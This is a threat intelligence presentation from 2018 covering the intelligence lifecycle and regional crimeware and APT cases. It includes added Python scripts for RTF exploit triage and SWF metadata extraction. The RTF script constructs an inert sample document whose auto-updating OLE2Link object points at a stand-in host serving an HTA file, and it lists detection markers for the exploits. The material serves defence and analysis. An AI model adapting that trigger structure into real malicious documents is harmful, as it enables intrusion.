Oleg Bondarenko - Threat Intelligence particularities world-wide. Real life use-cases.
©2018 FireEye | Private & Confidential
Threat Intelligence IS ... ?
▶ An out-of-the-box solution;
▶ Something that will solve all your needs;
▶ A feed that keeps running and protects your organization from Day 1;
▶ A guarantee that you are immune to cyber attacks;
▶ A perfect world.

Threat Intelligence IS NOT any of the above.
THREAT INTELLIGENCE IN A NUTSHELL
◆ What is Threat Intelligence?
▶ It is a proactive, forward-looking means of qualifying the threats poised to disrupt your business, based on the intents, tools and tactics of the attacker. High-fidelity, comprehensive intelligence delivers visibility beyond the typical attack lifecycle, adding context and priority to global threats before, during and after an attack. It helps mitigate risk, bolster incident response and enhance your overall security ecosystem. It allows you to anticipate attacks and refocus your attention on what matters most to your business.
Intelligence Lifecycle
1. Intelligence requirements (IR) collection and prioritization for further research and collection;
2. Research and collection;
3. Analysis and processing of discovered data;
4. Analysis and production to customers;
5. Dissemination and revision of the data.
Step 1. Intelligence requirements (IR) collection and prioritization for further research and collection
▶ Customer
– Generates/provides you with the requirements and data
▶ Analysts at CTI/customer
– Based on the threat landscape
▶ Regional SME
– Extremely important for targeted research
▶ Scope of customers for CTI
▶ Industry you represent
Step 2. Research and collection
▶ Planning
▶ Creating targets
▶ Building sources
▶ Collection
▶ Research
Step 3. Analysis and processing of discovered data
▶ Straightforward, based on your type of intel and your consumption model;
▶ Processing is the conversion of collected information into a form suitable for the production of intelligence. Incoming information is converted into formats that can be readily used by intelligence analysts in producing intelligence. Processing may include activities such as translation and reduction of intercepted messages into written format to permit detailed analysis and comparison with other information. Other types of processing include video production, photographic processing, and correlation of information collected by technical intelligence platforms.
Step 4. Analysis and production to customers
▶ Heading to the internal and possibly external customer of CTI;
▶ FINTEL (finished intelligence) creation;
▶ Production is the process of analyzing, evaluating, interpreting and integrating raw data and information into finished intelligence products for known or anticipated purposes and applications. The product may be developed from a single source or from all-source collection and databases. To be effective, intelligence production must focus on the consumer's needs. It should be objective, timely and, most importantly, accurate.
Step 5. Dissemination
▶ Heading to the external customer of CTI;
▶ Heading to customers and clients of the provider;
▶ Intelligence can be provided to the consumer in a wide range of formats, including verbal reports, written reports, imagery products and intelligence databases. Dissemination can be accomplished through physical exchanges of data and through interconnected data and communications networks.
Threat Intelligence Disciplines
▶ SIGINT
– Signals intelligence—gathered from interception of signals
▶ HUMINT
– Human Intelligence – gathered from a person on the ground.
▶ OSINT
– Open-source intelligence—gathered from open sources.
▶ MASINT
– Measurement and signature intelligence or scientific and technical intelligence
▶ TECHINT, IMINT, CYBERINT, ETC…
Targeted audience - consumption
▶ Tactical
– Engineers, NetOps
▶ Operational
– SOCs
▶ Operational+/All-in
– Analysts/Researchers
▶ Strategic
– C and E levels
Motivation
▶ APT/Espionage;
▶ eCrime;
▶ Information Operations/Hacktivism;
▶ ICS/SCADA.
Latin America Recap.
▶ Interest in compromised credentials for my organization;
▶ No interest in industry peers;
▶ Low readiness from organizations to remediate the threat;
▶ Localized cyber threat ecosystem;
▶ Unsophisticated communication platforms;
Latin America Recap. Attackers ecosystem.
▶ Boletos
▶ KL Remota
▶ Contador Dark 2018
▶ BR Chilean Malware
▶ FighterPOS, FlokiBot, and LockPOS
Latin America Recap. Use-case 1. KL Remota
▶ Popular crimeware tool in the Brazilian underground, named "Keylogger Remote";
– Likely based on "Spy-Net RAT";
▶ 'KL Remota' + 'KL DNS';
▶ 'KL DNS' is a toolkit which consists of a malicious script, a DNS server, and phishing pages.
Latin America Recap. Use-case 2. Contador Dark 2018
▶ Contador Dark 2018
▶ Distribution via github
▶ Infection vector: hxxps://XXX.githubusercontent.com
▶ TAAR J TeamViewer as a RAT
Latin America Recap. Use-case 3. FighterPOS, Floki, LockPOS.
▶ FighterPOS
– Visual Basic-compiled Trojan, but not principally point-of-sale (POS) malware;
– Keylogging, downloading and executing files;
– DDoS module;
– Borrowed some code, as usual, from "TomPOS", known back in 2014;
▶ Command to download the LockPOS executable
Latin America Recap. Use-case 3.
▶ Avalance Today
▶ Captain Black
Eastern Europe Recap.
▶ Obvious interest in compromised credentials for my organization;
▶ Medium and growing interest in industry peers;
▶ Low readiness from organizations to remediate the threat;
▶ Global cyber threat ecosystem;
▶ Highly sophisticated communication platforms;
Use-case 1. Temp.Metastrike/Cobalt
Let's call it group X. It has been continuously targeting financial organizations in numerous countries.
Ways to hunt it down:
- Botnet emulation;
- Threat hunting;
- Honeypots;
- Endpoint solutions;
Use-case 1. Initial stages of delivery and patch management
ThreadKit document exploit builder, vulnerabilities covered (all of them patched, so exposure is a patch-management question):
CVE-2017-0199, Microsoft Office/WordPad RCE via RTF (OLE2Link object auto-updated from a remote URL);
CVE-2015-1650, use-after-free vulnerability in Microsoft Word;
CVE-2016-4117, Adobe Flash Player vulnerability;
CVE-2017-8759, .NET Framework SOAP WSDL parser code injection, delivered through RTF documents;
CVE-2017-11882, Microsoft Office memory corruption vulnerability in the Equation Editor;
CVE-2017-8570, Microsoft Office RCE vulnerability (Composite Moniker);
CVE-2018-0802, Microsoft Office memory corruption vulnerability, the Equation Editor bypass of the CVE-2017-11882 fix.
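Two of the ThreadKit entries above leave recognisable traces in the RTF itself: CVE-2017-0199 needs an OLE2Link object plus the \objupdate control word, and CVE-2017-11882 / CVE-2018-0802 need an embedded Equation Editor object (ProgID "Equation.3", CLSID 0002CE02-0000-0000-C000-000000000046). The triage script below is an added example, not FireEye's or ThreadKit's code; it decodes every \objdata blob and reports which exploit family the object suggests. The sample RTF at the bottom is constructed for this example and its URL uses the 203.0.113.0/24 documentation range.

```python
"""Static triage of RTF documents for the exploit families that document
exploit builders such as ThreadKit package.

Added example, not FireEye's or ThreadKit's code. It relies on public
indicators only: CVE-2017-0199 abuses an OLE2Link object whose remote content
is fetched when Word honours \objupdate; CVE-2017-11882 and CVE-2018-0802
abuse embedded Equation Editor objects. The two Equation Editor CVEs cannot be
told apart without decoding the MTEF record, so both are reported. A hit means
"inspect/detonate this sample", not "malicious".
"""
import binascii
import re
import struct

# Equation Editor CLSID 0002CE02-0000-0000-C000-000000000046 as stored on disk
# (first three fields little-endian); it appears inside the embedded OLE data.
EQNEDT_CLSID_BYTES = bytes.fromhex("02ce020000000000c000000000000046")

_OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")
_ASCII_URL_RE = re.compile(rb"https?://[\x21-\x7e]{4,}")
# Same pattern in UTF-16LE, which is how URL monikers store their target.
_UTF16_URL_RE = re.compile(
    rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00){4,}")


def decode_objdata_blobs(rtf: bytes) -> list[bytes]:
    """Return the binary payload of every \objdata run.

    Word ignores whitespace inside the hex run, so we do too. Real samples often
    break the run with junk control words to defeat naive regexes; a production
    tool should use a full RTF tokenizer (e.g. rtfobj from oletools) instead.
    """
    blobs = []
    for m in _OBJDATA_RE.finditer(rtf):
        hexrun = re.sub(rb"\s", b"", m.group(1))
        hexrun = hexrun[: len(hexrun) & ~1]          # drop a dangling nibble
        blobs.append(binascii.unhexlify(hexrun))
    return blobs


def extract_urls(blob: bytes) -> list[str]:
    """Pull ASCII and UTF-16LE URLs (moniker targets) out of an object blob."""
    urls = [m.group(0).decode("ascii") for m in _ASCII_URL_RE.finditer(blob)]
    urls += [m.group(0).decode("utf-16le") for m in _UTF16_URL_RE.finditer(blob)]
    return urls


def triage_rtf(rtf: bytes) -> dict:
    """Summarise embedded objects and the CVEs their shape suggests."""
    has_objupdate = b"\\objupdate" in rtf
    objects, suspected = [], set()
    for blob in decode_objdata_blobs(rtf):
        entry = {
            "ole2link": b"OLE2Link" in blob,
            "equation": b"Equation.3" in blob or EQNEDT_CLSID_BYTES in blob,
            "urls": extract_urls(blob),
        }
        objects.append(entry)
        if entry["ole2link"] and has_objupdate:
            suspected.add("CVE-2017-0199")
        if entry["equation"]:
            suspected.update({"CVE-2017-11882", "CVE-2018-0802"})
    return {"objupdate": has_objupdate, "object_count": len(objects),
            "objects": objects, "suspected": sorted(suspected)}


def _ole1(progid: bytes, native: bytes) -> bytes:
    """Build a minimal OLE 1.0 embedded-object container (constructed test data)."""
    return (struct.pack("<II", 0x00000501, 2)            # OLE version, format=embedded
            + struct.pack("<I", len(progid) + 1) + progid + b"\x00"
            + struct.pack("<II", 0, 0)                   # empty topic and item names
            + struct.pack("<I", len(native)) + native)


# Constructed sample: one OLE2Link object (auto-updated) plus one Equation.3 object.
_LINK = _ole1(b"OLE2Link",
              "http://203.0.113.5/update.hta".encode("utf-16le") + b"\x00\x00")
_EQN = _ole1(b"Equation.3", EQNEDT_CLSID_BYTES + b"Equation Native" + b"\x00" * 16)
SAMPLE_RTF = (
    rb"{\rtf1\ansi\deff0 "
    rb"{\object\objautlink\objupdate\objw1\objh1{\*\objclass OLE2Link}{\*\objdata "
    + binascii.hexlify(_LINK) + rb"}} "
    rb"{\object\objemb{\*\objclass Equation.3}{\*\objdata "
    + binascii.hexlify(_EQN) + rb"}}\par}"
)

if __name__ == "__main__":
    import json
    print(json.dumps(triage_rtf(SAMPLE_RTF), indent=2))
```

Run it on a real sample with `triage_rtf(open(path, "rb").read())`; anything that reports a suspected CVE or a URL inside an object is a candidate for sandbox detonation, and the URL is a pivot for the botnet/distribution monitoring described later in the deck.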
Use-case 1. Tracking complete campaign
▶ Threat component;
▶ Actor/group attribution;
▶ Botnet/distribution monitoring based on hunting and sensors data;
▶ TTPs analysis
▶ Naming correlation;
Use-case 2. Mobile Threat. Red Alert, 1 year ago
Launch 2017 (call it a soft launch). Targeted banks:
▶ Poland: Raiffeisen Poland, Bank Pekao, Bank Zachodni WBK, ING Bank, mBank, Millennium Bank
▶ Germany: Postbank, Commerzbank, Comdirect
▶ France: Crédit Mutuel, Banque Palatine, Banque Populaire, Ma Banque, Lapost bank, Mes Comptes Banque, Mes Comptes BNP Paribas
▶ Italy: Intesa Sanpaolo, UBI
▶ Turkey: Akbank, Finansbank, Garanti Bank, Turkiye Bankasi, Halkbank, VakifBank, Yapi Kredi, Ziraat Bank
Red Alert. Today
▶ Targeted countries: Australia, Austria, Belgium, Czech Republic, France, Germany, Hungary, India, Italy, Latvia, Lithuania, Poland, Netherlands, Switzerland, Spain, Romania, Turkey, UAE, United Kingdom, United States.
Use-case 3. APT28
▶ Usage of Flash exploit CVE-2018-4878
▶ Geography:
– Austria
– Montenegro
– Norway
▶ The documents observed had an embedded parent Flash movie with the following XMP metadata:
• <dc:date>06.03.2018</dc:date>
– Metadata showing the potential creation date
▶ The Flash movie leverages code from the following open-source project as a framework to load the embedded malicious content:
– hxxps://github.com/XXXXXX/f4player
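The dc:date pivot above comes from the XMP block that Flash tooling writes into the SWF's Metadata tag (tag code 77). The script below is an added example, not FireEye's tooling: it walks the SWF header and tag stream, inflates CWS (zlib-compressed) movies, and pulls dc:date and a few other XMP fields so the same pivot can be applied to any SWF carved out of a document. The sample SWF is constructed in memory; its date string copies the one on the slide and its CreatorTool value is made up for the example.

```python
"""Extract XMP metadata (dc:date and friends) from a Flash movie.

Added example, not FireEye's code. SWF layout used here is the public one:
'FWS'/'CWS'/'ZWS' magic, version byte, little-endian uncompressed length,
then (after optional compression) a RECT, frame rate, frame count and a tag
stream of (code, length, payload) records. XMP lives in tag 77 (Metadata).
"""
import re
import struct
import zlib

FILE_ATTRIBUTES_TAG = 69
METADATA_TAG = 77
END_TAG = 0

_XMP_FIELDS = {
    "dc_date": re.compile(r"<dc:date>(.*?)</dc:date>", re.S),
    "create_date": re.compile(r"<xmp:CreateDate>(.*?)</xmp:CreateDate>", re.S),
    "creator_tool": re.compile(r"<xmp:CreatorTool>(.*?)</xmp:CreatorTool>", re.S),
}


def swf_body(data: bytes) -> tuple[int, int, bytes]:
    """Return (version, declared length, uncompressed body after the 8-byte header)."""
    magic, version = data[:3], data[3]
    length = struct.unpack_from("<I", data, 4)[0]
    if magic == b"FWS":
        body = data[8:]
    elif magic == b"CWS":
        body = zlib.decompress(data[8:])
    elif magic == b"ZWS":
        # LZMA SWF (v13+) uses a custom header; needs lzma.FORMAT_RAW, omitted here.
        raise NotImplementedError("ZWS (LZMA-compressed) SWF not handled")
    else:
        raise ValueError("not a SWF: bad magic %r" % magic)
    return version, length, body


def iter_tags(body: bytes):
    """Yield (code, payload) for each tag after the RECT / frame header."""
    nbits = body[0] >> 3                       # RECT: 5-bit field width, 4 fields
    pos = (5 + 4 * nbits + 7) // 8             # bytes consumed by the RECT
    pos += 4                                   # frame rate (8.8 fixed) + frame count
    while pos + 2 <= len(body):
        code_len = struct.unpack_from("<H", body, pos)[0]
        pos += 2
        code, length = code_len >> 6, code_len & 0x3F
        if length == 0x3F:                     # long form: 32-bit length follows
            length = struct.unpack_from("<I", body, pos)[0]
            pos += 4
        yield code, body[pos:pos + length]
        pos += length
        if code == END_TAG:
            break


def extract_metadata(swf: bytes) -> dict:
    """Parse a SWF and return version, tag codes and the XMP fields found."""
    version, length, body = swf_body(swf)
    info = {"version": version, "length_ok": len(body) + 8 == length,
            "tags": [], "xmp": None}
    info.update({k: None for k in _XMP_FIELDS})
    for code, payload in iter_tags(body):
        info["tags"].append(code)
        if code == METADATA_TAG:
            xmp = payload.split(b"\x00", 1)[0].decode("utf-8", "replace")
            info["xmp"] = xmp
            for key, rx in _XMP_FIELDS.items():
                m = rx.search(xmp)
                if m:   # strip rdf:Seq/rdf:li wrappers some tools emit
                    info[key] = re.sub(r"<[^>]+>", "", m.group(1)).strip()
    return info


def build_sample_swf(xmp: str, compress: bool = True) -> bytes:
    """Construct a minimal SWF with FileAttributes, Metadata and End tags (test data)."""
    def tag(code: int, payload: bytes) -> bytes:
        if len(payload) < 0x3F:
            return struct.pack("<H", (code << 6) | len(payload)) + payload
        return struct.pack("<HI", (code << 6) | 0x3F, len(payload)) + payload
    body = (b"\x00"                                     # RECT with nbits=0
            + struct.pack("<HH", 0x1800, 1)             # 24.0 fps, 1 frame
            + tag(FILE_ATTRIBUTES_TAG, b"\x10\x00\x00\x00")  # HasMetadata flag
            + tag(METADATA_TAG, xmp.encode("utf-8") + b"\x00")
            + tag(END_TAG, b""))
    header = struct.pack("<I", 8 + len(body))
    if compress:
        return b"CWS" + bytes([10]) + header + zlib.compress(body)
    return b"FWS" + bytes([10]) + header + body


# Constructed XMP packet; the dc:date copies the slide, CreatorTool is invented.
SAMPLE_XMP = (
    '<x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF '
    'xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:Description '
    'xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmp="http://ns.adobe.com/xap/1.0/">'
    '<dc:date>06.03.2018</dc:date><xmp:CreatorTool>Example Flash Compiler</xmp:CreatorTool>'
    '</rdf:Description></rdf:RDF></x:xmpmeta>'
)

if __name__ == "__main__":
    print(extract_metadata(build_sample_swf(SAMPLE_XMP)))
```

A `length_ok` of False on a carved sample usually means the object was truncated or padded by the carrier document, which is worth noting before comparing hashes across samples.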
APJ. Recap.
▶ Obvious interest in compromised credentials for my organization;
▶ Medium and growing interest in industry peers;
▶ Rapidly growing readiness from organizations to remediate the threat;
▶ Mostly localized, region-specific cyber threat ecosystem;
▶ Unsophisticated communication platforms;
Use-case 1. APJ
▶ Japanese credit card CVVs
▶ 'Mbackup’ Android bot
– call history and SMS;
– record of incoming/outgoing calls;
– QQ, WeChat, Momo, Yixin and YY;
Use-case 2. APJ. APT37
▶ Usage of Flash exploit CVE-2018-4878
▶ Geography:
– S. Korea;
– Middle East;
– Japan;
– Vietnam;
Use-case 2. APT37 TTPs
▶ Distribution:
– Spear-phishing;
– Strategic web compromise (SWC);
– Torrent file-sharing;
▶ Tools:
– Exfil tools with hard-coded HTTP POST headers;
– Backdoors;
– Wiper;
– Multi-stage downloaders.